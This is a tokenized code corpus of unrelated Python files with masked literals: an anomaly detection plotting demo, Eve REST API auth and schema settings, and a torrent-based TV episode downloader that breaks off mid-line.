<NUM_LIT:0> <EOL> lines = open ( testenv . path ( '<STR_LIT:test>' , '<STR_LIT>' ) ) . readlines ( ) <EOL> assert '<STR_LIT>' in lines <EOL> assert "<STR_LIT>" in lines <EOL> assert "<STR_LIT>" in lines <EOL> assert "<STR_LIT>" in lines <EOL> assert "<STR_LIT>" in lines <EOL> assert "<STR_LIT>" in lines <EOL> assert "<STR_LIT>" in lines <EOL> assert "<STR_LIT>" in lines </s>
<s> import cvxopt as co <EOL> import numpy as np <EOL> import pylab as pl <EOL> import matplotlib . pyplot as plt <EOL> import math <EOL> from ssad import SSAD <EOL> from ocsvm import OCSVM <EOL> from mkl import MKLWrapper <EOL> from kernel import Kernel <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> """<STR_LIT>""" <EOL> P_NORM = <NUM_LIT> <EOL> N_pos = <NUM_LIT:100> <EOL> N_neg = <NUM_LIT:100> <EOL> N_unl = <NUM_LIT:200> <EOL> yp = co . matrix ( <NUM_LIT:1> , ( <NUM_LIT:1> , N_pos ) , '<STR_LIT:i>' ) <EOL> yu = co . matrix ( <NUM_LIT:0> , ( <NUM_LIT:1> , N_unl ) , '<STR_LIT:i>' ) <EOL> yn = co . matrix ( - <NUM_LIT:1> , ( <NUM_LIT:1> , N_neg ) , '<STR_LIT:i>' ) <EOL> Dy = co . matrix ( [ [ yp ] , [ yu ] , [ yn ] , [ yn ] , [ yn ] , [ yn ] ] ) <EOL> co . setseed ( <NUM_LIT:11> ) <EOL> Dtrainp = co . normal ( <NUM_LIT:2> , N_pos ) * <NUM_LIT> <EOL> Dtrainu = co . normal ( <NUM_LIT:2> , N_unl ) * <NUM_LIT> <EOL> Dtrainn = co . normal ( <NUM_LIT:2> , N_neg ) * <NUM_LIT> <EOL> Dtrain21 = Dtrainn - <NUM_LIT:1> <EOL> Dtrain21 [ <NUM_LIT:0> , : ] = Dtrainn [ <NUM_LIT:0> , : ] + <NUM_LIT:1> <EOL> Dtrain22 = - Dtrain21 <EOL> Dtrain = co . matrix ( [ [ Dtrainp ] , [ Dtrainu ] , [ Dtrainn + <NUM_LIT:1.0> ] , [ Dtrainn - <NUM_LIT:1.0> ] , [ Dtrain21 ] , [ Dtrain22 ] ] ) <EOL> kernel1 = Kernel . get_kernel ( Dtrain , Dtrain , type = '<STR_LIT>' , param = <NUM_LIT:1.0> ) <EOL> kernel2 = Kernel . get_kernel ( Dtrain , Dtrain , type = '<STR_LIT>' , param = <NUM_LIT:1.0> / <NUM_LIT> ) <EOL> kernel3 = Kernel . get_kernel ( Dtrain , Dtrain , type = '<STR_LIT>' , param = <NUM_LIT:1.0> / <NUM_LIT> ) <EOL> kernel4 = Kernel . get_kernel ( Dtrain , Dtrain , type = '<STR_LIT>' ) <EOL> ad = SSAD ( [ ] , Dy , <NUM_LIT:1.0> , <NUM_LIT:1.0> , <NUM_LIT:1.0> / ( N_unl * <NUM_LIT> ) , <NUM_LIT:1.0> ) <EOL> ssad = MKLWrapper ( ad , [ kernel1 , kernel2 , kernel3 , kernel4 ] , Dy , P_NORM ) <EOL> ssad . train_dual ( ) <EOL> kernel1 = Kernel . get_kernel ( Dtrain , Dtrain [ : , ssad . get_support_dual ( ) ] , type = '<STR_LIT>' , param = <NUM_LIT:1.0> ) <EOL> kernel2 = Kernel . get_kernel ( Dtrain , Dtrain [ : , ssad . get_support_dual ( ) ] , type = '<STR_LIT>' , param = <NUM_LIT:1.0> / <NUM_LIT> ) <EOL> kernel3 = Kernel . get_kernel ( Dtrain , Dtrain [ : , ssad . get_support_dual ( ) ] , type = '<STR_LIT>' , param = <NUM_LIT:1.0> / <NUM_LIT> ) <EOL> kernel4 = Kernel . get_kernel ( Dtrain , Dtrain [ : , ssad . get_support_dual ( ) ] , type = '<STR_LIT>' , ) <EOL> thres = np . array ( ssad . get_threshold ( ) ) [ <NUM_LIT:0> , <NUM_LIT:0> ] <EOL> pred = ssad . apply_dual ( [ kernel1 , kernel2 , kernel3 , kernel4 ] ) <EOL> pred = np . array ( pred ) <EOL> pred = pred . transpose ( ) <EOL> delta = <NUM_LIT:0.1> <EOL> x = np . arange ( - <NUM_LIT> , <NUM_LIT> , delta ) <EOL> y = np . arange ( - <NUM_LIT> , <NUM_LIT> , delta ) <EOL> X , Y = np . meshgrid ( x , y ) <EOL> ( sx , sy ) = X . shape <EOL> Xf = np . reshape ( X , ( <NUM_LIT:1> , sx * sy ) ) <EOL> Yf = np . reshape ( Y , ( <NUM_LIT:1> , sx * sy ) ) <EOL> Dtest = np . append ( Xf , Yf , axis = <NUM_LIT:0> ) <EOL> print ( Dtest . shape ) <EOL> kernel1 = Kernel . get_kernel ( co . matrix ( Dtest ) , Dtrain [ : , ssad . get_support_dual ( ) ] , type = '<STR_LIT>' , param = <NUM_LIT:1.0> ) <EOL> kernel2 = Kernel . get_kernel ( co . matrix ( Dtest ) , Dtrain [ : , ssad . get_support_dual ( ) ] , type = '<STR_LIT>' , param = <NUM_LIT:1.0> / <NUM_LIT> ) <EOL> kernel3 = Kernel . get_kernel ( co . matrix ( Dtest ) , Dtrain [ : , ssad . get_support_dual ( ) ] , type = '<STR_LIT>' , param = <NUM_LIT:1.0> / <NUM_LIT> ) <EOL> kernel4 = Kernel . get_kernel ( co . matrix ( Dtest ) , Dtrain [ : , ssad . get_support_dual ( ) ] , type = '<STR_LIT>' ) <EOL> res = ssad . apply_dual ( [ kernel1 , kernel2 , kernel3 , kernel4 ] ) <EOL> Z = np . reshape ( res , ( sx , sy ) ) <EOL> plt . figure ( ) <EOL> plt . contourf ( X , Y , Z , <NUM_LIT:20> ) <EOL> plt . contour ( X , Y , Z , [ np . array ( ssad . get_threshold ( ) ) [ <NUM_LIT:0> , <NUM_LIT:0> ] ] ) <EOL> plt . scatter ( Dtrain [ <NUM_LIT:0> , ssad . get_support_dual ( ) ] , Dtrain [ <NUM_LIT:1> , ssad . get_support_dual ( ) ] , <NUM_LIT> , c = '<STR_LIT:w>' ) <EOL> plt . scatter ( Dtrain [ <NUM_LIT:0> , N_pos : N_pos + N_unl - <NUM_LIT:1> ] , Dtrain [ <NUM_LIT:1> , N_pos : N_pos + N_unl - <NUM_LIT:1> ] , <NUM_LIT:10> , c = '<STR_LIT:g>' ) <EOL> plt . scatter ( Dtrain [ <NUM_LIT:0> , <NUM_LIT:0> : N_pos ] , Dtrain [ <NUM_LIT:1> , <NUM_LIT:0> : N_pos ] , <NUM_LIT:20> , c = '<STR_LIT:r>' ) <EOL> plt . scatter ( Dtrain [ <NUM_LIT:0> , N_pos + N_unl : ] , Dtrain [ <NUM_LIT:1> , N_pos + N_unl : ] , <NUM_LIT:20> , c = '<STR_LIT:b>' ) <EOL> plt . figure ( ) <EOL> plt . bar ( [ i + <NUM_LIT:1> for i in range ( <NUM_LIT:4> ) ] , ssad . get_mixing_coefficients ( ) ) <EOL> plt . show ( ) <EOL> print ( '<STR_LIT>' ) </s>
<s> """<STR_LIT>""" <EOL> from eve import Eve <EOL> from eve . auth import BasicAuth <EOL> class MyBasicAuth ( BasicAuth ) : <EOL> def check_auth ( self , username , password , allowed_roles , resource , method ) : <EOL> return username == '<STR_LIT>' and password == '<STR_LIT>' <EOL> app = Eve ( auth = MyBasicAuth ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> app . run ( ) </s>
<s> """<STR_LIT>""" <EOL> from eve . methods . get import get , getitem <EOL> from eve . methods . post import post <EOL> from eve . methods . patch import patch <EOL> from eve . methods . put import put <EOL> from eve . methods . delete import delete , deleteitem </s>
<s> import copy <EOL> MONGO_HOST = '<STR_LIT:localhost>' <EOL> MONGO_PORT = <NUM_LIT> <EOL> MONGO_USERNAME = MONGO1_USERNAME = '<STR_LIT>' <EOL> MONGO_PASSWORD = MONGO1_PASSWORD = '<STR_LIT>' <EOL> MONGO_DBNAME , MONGO1_DBNAME = '<STR_LIT>' , '<STR_LIT>' <EOL> ID_FIELD = '<STR_LIT>' <EOL> RESOURCE_METHODS = [ '<STR_LIT:GET>' , '<STR_LIT:POST>' , '<STR_LIT>' ] <EOL> ITEM_METHODS = [ '<STR_LIT:GET>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> ITEM_CACHE_CONTROL = '<STR_LIT>' <EOL> ITEM_LOOKUP = True <EOL> ITEM_LOOKUP_FIELD = ID_FIELD <EOL> disabled_bulk = { <EOL> '<STR_LIT:url>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:type>' : '<STR_LIT:string>' <EOL> } <EOL> } <EOL> } <EOL> contacts = { <EOL> '<STR_LIT:url>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:20> , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:url>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : { '<STR_LIT:username>' : { '<STR_LIT>' : False } } } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:type>' : '<STR_LIT:string>' , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : True , <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:type>' : '<STR_LIT>' <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:type>' : '<STR_LIT>' <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:type>' : '<STR_LIT:list>' , <EOL> '<STR_LIT>' : [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] , <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:type>' : '<STR_LIT:list>' , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:type>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : { '<STR_LIT:type>' : '<STR_LIT:string>' , '<STR_LIT>' : <NUM_LIT:10> } , <EOL> '<STR_LIT>' : { '<STR_LIT:type>' : '<STR_LIT>' } , <EOL> } , <EOL> } , <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:type>' : '<STR_LIT:list>' , <EOL> '<STR_LIT>' : [ { '<STR_LIT:type>' : '<STR_LIT:string>' } , { '<STR_LIT:type>' : '<STR_LIT>' } , ] <EOL> } , <EOL> '<STR_LIT:location>' : { <EOL> '<STR_LIT:type>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:address>' : { '<STR_LIT:type>' : '<STR_LIT:string>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:type>' : '<STR_LIT:string>' , '<STR_LIT>' : True } <EOL> } , <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:type>' : '<STR_LIT>' , <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:type>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True <EOL> } , <EOL> '<STR_LIT:title>' : { <EOL> '<STR_LIT:type>' : '<STR_LIT:string>' , <EOL> '<STR_LIT:default>' : '<STR_LIT>' , <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:type>' : '<STR_LIT:list>' , <EOL> '<STR_LIT>' : { '<STR_LIT:type>' : '<STR_LIT>' } <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:type>' : '<STR_LIT:list>' , <EOL> '<STR_LIT>' : { '<STR_LIT:type>' : '<STR_LIT>' , '<STR_LIT>' : { '<STR_LIT:id>' : { '<STR_LIT:type>' : '<STR_LIT>' } } } <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:type>' : '<STR_LIT:list>' , <EOL> '<STR_LIT>' : [ { '<STR_LIT:type>' : '<STR_LIT>' } ] <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:type>' : '<STR_LIT:string>' , <EOL> '<STR_LIT:default>' : '<STR_LIT:default>' <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:type>' : '<STR_LIT:string>' , <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:type>' : '<STR_LIT:string>' , <EOL> '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT:value>' } <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:type>' : '<STR_LIT:string>' , <EOL> '<STR_LIT:default>' : '<STR_LIT:default>' , <EOL> '<STR_LIT>' : True <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:type>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:type>' : '<STR_LIT:string>' , <EOL> '<STR_LIT:default>' : '<STR_LIT:default>' , <EOL> '<STR_LIT>' : True <EOL> } <EOL> } <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:type>' : '<STR_LIT:string>' , <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:type>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { '<STR_LIT:type>' : '<STR_LIT:string>' , '<STR_LIT>' : '<STR_LIT>' } <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:type>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { '<STR_LIT:type>' : '<STR_LIT>' } <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:type>' : '<STR_LIT>' , <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:type>' : '<STR_LIT:float>' , <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:type>' : '<STR_LIT>' <EOL> } <EOL> } <EOL> } <EOL> users = copy . deepcopy ( contacts ) <EOL> users [ '<STR_LIT:url>' ] = '<STR_LIT>' <EOL> users [ '<STR_LIT>' ] = { '<STR_LIT:source>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { '<STR_LIT:username>' : { '<STR_LIT>' : True } } , <EOL> '<STR_LIT>' : { '<STR_LIT:username>' : <NUM_LIT:1> , '<STR_LIT>' : <NUM_LIT:1> } } <EOL> users [ '<STR_LIT>' ] [ '<STR_LIT:username>' ] = { '<STR_LIT:type>' : '<STR_LIT:string>' , '<STR_LIT>' : True } <EOL> users [ '<STR_LIT>' ] = [ '<STR_LIT>' , '<STR_LIT:POST>' , '<STR_LIT:GET>' ] <EOL> users [ '<STR_LIT>' ] = '<STR_LIT:user>' <EOL> users [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT:username>' <EOL> invoices = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : { '<STR_LIT:type>' : '<STR_LIT:string>' } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:type>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:type>' : '<STR_LIT:list>' , <EOL> '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:type>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } <EOL> } , <EOL> } <EOL> } <EOL> versioned_invoices = copy . deepcopy ( invoices ) <EOL> versioned_invoices [ '<STR_LIT>' ] = True <EOL> required_invoices = copy . deepcopy ( invoices ) <EOL> required_invoices [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] = True <EOL> companies = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:type>' : '<STR_LIT:list>' , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:type>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:title>' : { '<STR_LIT:type>' : '<STR_LIT:string>' } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:type>' : '<STR_LIT:list>' , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:type>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } , <EOL> } <EOL> } <EOL> } <EOL> } <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:type>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } , <EOL> } <EOL> } <EOL> } <EOL> users_overseas = copy . deepcopy ( users ) <EOL> users_overseas [ '<STR_LIT:url>' ] = '<STR_LIT>' <EOL> users_overseas [ '<STR_LIT>' ] = { '<STR_LIT:source>' : '<STR_LIT>' } <EOL> payments = { <EOL> '<STR_LIT>' : [ '<STR_LIT:GET>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT:GET>' ] , <EOL> } <EOL> empty = copy . deepcopy ( invoices ) <EOL> user_restricted_access = copy . deepcopy ( contacts ) <EOL> user_restricted_access [ '<STR_LIT:url>' ] = '<STR_LIT>' <EOL> user_restricted_access [ '<STR_LIT>' ] = { '<STR_LIT:source>' : '<STR_LIT>' } <EOL> users_invoices = copy . deepcopy ( invoices ) <EOL> users_invoices [ '<STR_LIT:url>' ] = '<STR_LIT>' <EOL> users_invoices [ '<STR_LIT>' ] = { '<STR_LIT:source>' : '<STR_LIT>' } <EOL> users_required_invoices = copy . deepcopy ( required_invoices ) <EOL> users_required_invoices [ '<STR_LIT:url>' ] = '<STR_LIT>' <EOL> users_required_invoices [ '<STR_LIT>' ] = { '<STR_LIT:source>' : '<STR_LIT>' } <EOL> users_searches = copy . deepcopy ( invoices ) <EOL> users_searches [ '<STR_LIT>' ] = { '<STR_LIT:source>' : '<STR_LIT>' } <EOL> users_searches [ '<STR_LIT:url>' ] = '<STR_LIT>' <EOL> internal_transactions = { <EOL> '<STR_LIT>' : [ '<STR_LIT:GET>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT:GET>' ] , <EOL> '<STR_LIT>' : True <EOL> } <EOL> ids = { <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : '<STR_LIT:id>' , <EOL> '<STR_LIT>' : [ '<STR_LIT:POST>' , '<STR_LIT:GET>' ] , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:id>' : { '<STR_LIT:type>' : '<STR_LIT:string>' } , <EOL> '<STR_LIT:name>' : { '<STR_LIT:type>' : '<STR_LIT:string>' } <EOL> } <EOL> } <EOL> login = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:url>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:password>' : <NUM_LIT:0> <EOL> } <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:email>' : { <EOL> '<STR_LIT:type>' : '<STR_LIT:string>' , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : True <EOL> } , <EOL> '<STR_LIT:password>' : { <EOL> '<STR_LIT:type>' : '<STR_LIT:string>' , <EOL> '<STR_LIT>' : True <EOL> } <EOL> } <EOL> } <EOL> products = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:type>' : '<STR_LIT:string>' , <EOL> '<STR_LIT>' : <NUM_LIT:16> <EOL> } , <EOL> '<STR_LIT:title>' : { <EOL> '<STR_LIT:type>' : '<STR_LIT:string>' , <EOL> '<STR_LIT>' : <NUM_LIT:4> , <EOL> '<STR_LIT>' : <NUM_LIT:32> <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:type>' : '<STR_LIT:string>' , <EOL> '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } <EOL> } <EOL> } <EOL> } <EOL> child_products = copy . deepcopy ( products ) <EOL> child_products [ '<STR_LIT:url>' ] = '<STR_LIT>' <EOL> child_products [ '<STR_LIT>' ] = { '<STR_LIT:source>' : '<STR_LIT>' } <EOL> exclusion = copy . deepcopy ( contacts ) <EOL> exclusion [ '<STR_LIT:url>' ] = '<STR_LIT>' <EOL> exclusion [ '<STR_LIT>' ] = True <EOL> exclusion [ '<STR_LIT>' ] [ '<STR_LIT:source>' ] = '<STR_LIT>' <EOL> exclusion [ '<STR_LIT>' ] [ '<STR_LIT>' ] = { '<STR_LIT:int>' : <NUM_LIT:0> } <EOL> DOMAIN = { <EOL> '<STR_LIT>' : disabled_bulk , <EOL> '<STR_LIT>' : contacts , <EOL> '<STR_LIT>' : users , <EOL> '<STR_LIT>' : users_overseas , <EOL> '<STR_LIT>' : invoices , <EOL> '<STR_LIT>' : versioned_invoices , <EOL> '<STR_LIT>' : required_invoices , <EOL> '<STR_LIT>' : payments , <EOL> '<STR_LIT>' : empty , <EOL> '<STR_LIT>' : user_restricted_access , <EOL> '<STR_LIT>' : users_invoices , <EOL> '<STR_LIT>' : users_required_invoices , <EOL> '<STR_LIT>' : users_searches , <EOL> '<STR_LIT>' : companies , <EOL> '<STR_LIT>' : internal_transactions , <EOL> '<STR_LIT>' : ids , <EOL> '<STR_LIT>' : login , <EOL> '<STR_LIT>' : products , <EOL> '<STR_LIT>' : child_products , <EOL> '<STR_LIT>' : exclusion , <EOL> } </s>
<s> __appname__ = "<STR_LIT>" <EOL> __version__ = "<STR_LIT>" <EOL> __author__ = "<STR_LIT>" <EOL> __license__ = "<STR_LIT>" <EOL> __doc__ = '''<STR_LIT>''' <EOL> import getopt <EOL> import sys <EOL> import logging <EOL> import re <EOL> import t411 <EOL> try : <EOL> import tpb <EOL> except : <EOL> print ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> try : <EOL> import tvdb_api <EOL> except : <EOL> tvdbapi_tag = False <EOL> else : <EOL> tvdbapi_tag = True <EOL> try : <EOL> import transmissionrpc <EOL> except : <EOL> transmissionrpc_tag = False <EOL> else : <EOL> transmissionrpc_tag = True <EOL> tpb_url = "<STR_LIT>" <EOL> tpb_categories = { } <EOL> tpb_categories_ld = { tpb . CATEGORIES . VIDEO . TV_SHOWS : '<STR_LIT>' } <EOL> tpb_categories_hd = { tpb . CATEGORIES . VIDEO . HD_TV_SHOWS : '<STR_LIT>' } <EOL> transmission_rcp = "<STR_LIT>" <EOL> class tvdb ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , title = "<STR_LIT>" ) : <EOL> self . tvdb_tag = tvdbapi_tag <EOL> if ( self . tvdb_tag ) : <EOL> self . tvdb = tvdb_api . Tvdb ( ) <EOL> try : <EOL> self . tvdb_serie = self . get_serie ( title ) <EOL> except : <EOL> self . tvdb_serie = None <EOL> self . tvdb_season = None <EOL> self . tvdb_episode = None <EOL> def get_serie ( self , title = "<STR_LIT>" ) : <EOL> if ( self . tvdb_tag ) : <EOL> self . tvdb_serie = self . tvdb [ title ] <EOL> self . data = self . tvdb_serie . data <EOL> return self . tvdb_serie <EOL> def get_season ( self , season = <NUM_LIT:0> ) : <EOL> if ( self . tvdb_tag and ( self . tvdb_serie != None ) ) : <EOL> self . tvdb_season = self . tvdb_serie [ season ] <EOL> return self . tvdb_season <EOL> def get_season_number ( self ) : <EOL> if ( self . tvdb_tag and ( self . tvdb_serie != None ) ) : <EOL> return len ( self . tvdb_serie ) - <NUM_LIT:1> <EOL> return - <NUM_LIT:1> <EOL> def get_episode ( self , season , episode ) : <EOL> if ( self . tvdb_tag and ( self . tvdb_serie != None ) ) : <EOL> self . tvdb_episode = self . tvdb_serie [ season ] [ episode ] <EOL> return self . tvdb_episode <EOL> def get_episode_number ( self , season ) : <EOL> if ( self . tvdb_tag and ( self . tvdb_serie != None ) ) : <EOL> return len ( self . tvdb_serie [ season ] ) <EOL> return - <NUM_LIT:1> <EOL> class series_t411 ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , <EOL> title = "<STR_LIT>" , season = "<STR_LIT>" , episode = "<STR_LIT>" , seeders_min = <NUM_LIT:0> , directory_download = None ) : <EOL> self . title = title <EOL> self . source = self . __readsource__ ( ) <EOL> self . season = season <EOL> self . episode = episode <EOL> self . seeders_min = seeders_min <EOL> self . dir_download = directory_download <EOL> self . regexp = self . search_regexp ( ) <EOL> logging . debug ( "<STR_LIT>" % self . regexp ) <EOL> self . list = self . buildlist ( ) <EOL> self . list . sort ( key = lambda torrent : int ( torrent [ <NUM_LIT:1> ] ) , reverse = True ) <EOL> logging . info ( "<STR_LIT>" % len ( self . list ) ) <EOL> def downloadbest ( self ) : <EOL> best = self . getbest ( ) <EOL> if best is not None : <EOL> return self . source . download ( best [ <NUM_LIT:2> ] , filename = best [ <NUM_LIT:0> ] , directory = self . dir_download ) <EOL> else : <EOL> logging . error ( "<STR_LIT>" ) <EOL> return None <EOL> def __readsource__ ( self ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> src = t411 . T411 ( ) <EOL> except Exception as e : <EOL> logging . error ( "<STR_LIT>" % e . message ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> else : <EOL> print ( "<STR_LIT>" ) <EOL> return src <EOL> def search_regexp ( self ) : <EOL> """<STR_LIT>""" <EOL> if ( ( self . season == "<STR_LIT>" ) and ( self . episode == "<STR_LIT>" ) ) : <EOL> regexp = '<STR_LIT>' % self . title . lower ( ) <EOL> elif ( self . episode == "<STR_LIT>" ) : <EOL> regexp = '<STR_LIT>' % ( self . title . lower ( ) , self . season , self . season ) <EOL> else : <EOL> regexp = '<STR_LIT>' % ( self . title . lower ( ) , self . season , self . episode , self . season , self . episode ) <EOL> return regexp <EOL> def buildlist ( self , category = tpb . CATEGORIES . VIDEO . TV_SHOWS , limit = <NUM_LIT:1000> ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> s = self . source . search ( self . title . lower ( ) , limit ) <EOL> except Exception as e : <EOL> logging . error ( "<STR_LIT>" ) <EOL> logging . error ( e . message ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> try : <EOL> for t in s . items ( ) : <EOL> pass <EOL> except : <EOL> logging . error ( "<STR_LIT>" ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> torrentlist = [ ] <EOL> for torrent in s [ '<STR_LIT>' ] : <EOL> if isinstance ( torrent , dict ) : <EOL> if ( re . search ( self . regexp , torrent [ '<STR_LIT:name>' ] . lower ( ) ) and ( int ( torrent [ '<STR_LIT>' ] ) >= self . seeders_min ) ) : <EOL> torrentlist . append ( ( torrent [ '<STR_LIT:name>' ] , torrent [ '<STR_LIT>' ] , torrent [ '<STR_LIT:id>' ] ) ) <EOL> logging . debug ( "<STR_LIT>" % ( len ( torrentlist ) ) ) <EOL> return torrentlist <EOL> def getbest ( self ) : <EOL> """<STR_LIT>""" <EOL> if ( len ( self . list ) > <NUM_LIT:0> ) : <EOL> return self . list [ <NUM_LIT:0> ] <EOL> else : <EOL> return None <EOL> def getall ( self ) : <EOL> """<STR_LIT>""" <EOL> if ( len ( self . list ) > <NUM_LIT:0> ) : <EOL> return self . list <EOL> else : <EOL> return None <EOL> class series_pb ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , tpb_url = "<STR_LIT>" , <EOL> title = "<STR_LIT>" , season = "<STR_LIT>" , episode = "<STR_LIT>" , seeders_min = <NUM_LIT:0> ) : <EOL> self . tpb_url = tpb_url <EOL> self . source = self . __readsource__ ( ) <EOL> self . title = title <EOL> self . season = season <EOL> self . episode = episode <EOL> self . seeders_min = seeders_min <EOL> logging . info ( "<STR_LIT>" ) <EOL> self . tvdb = tvdb ( self . title ) <EOL> self . regexp = self . search_regexp ( ) <EOL> logging . debug ( "<STR_LIT>" % self . regexp ) <EOL> self . list = [ ] <EOL> for c in tpb_categories . keys ( ) : <EOL> self . list += self . buildlist ( category = c ) <EOL> self . list . sort ( key = lambda torrent : torrent [ <NUM_LIT:1> ] , reverse = True ) <EOL> logging . info ( "<STR_LIT>" % len ( self . list ) ) <EOL> def __tpb_error_ ( self ) : <EOL> logging . info ( "<STR_LIT>" % self . tpb_url ) <EOL> logging . debug ( "<STR_LIT>" ) <EOL> def __readsource__ ( self ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> s = tpb . TPB ( self . tpb_url ) <EOL> except : <EOL> logging . error ( "<STR_LIT>" ) <EOL> self . __tpb_error_ ( ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> else : <EOL> logging . debug ( "<STR_LIT>" ) <EOL> return s <EOL> def search_regexp ( self ) : <EOL> """<STR_LIT>""" <EOL> if ( ( self . season == "<STR_LIT>" ) and ( self . episode == "<STR_LIT>" ) ) : <EOL> try : <EOL> print ( "<STR_LIT>" % ( self . tvdb . data [ '<STR_LIT>' ] , self . tvdb . get_season_number ( ) , self . tvdb . data [ '<STR_LIT:status>' ] . lower ( ) ) ) <EOL> except : <EOL> pass <EOL> regexp = '<STR_LIT>' % self . title . lower ( ) <EOL> elif ( self . episode == "<STR_LIT>" ) : <EOL> try : <EOL> print ( "<STR_LIT>" % ( self . tvdb . data [ '<STR_LIT>' ] , self . tvdb . get_episode_number ( int ( self . season ) ) , self . season ) ) <EOL> except : <EOL> pass <EOL> regexp = '<STR_LIT>' % ( self . 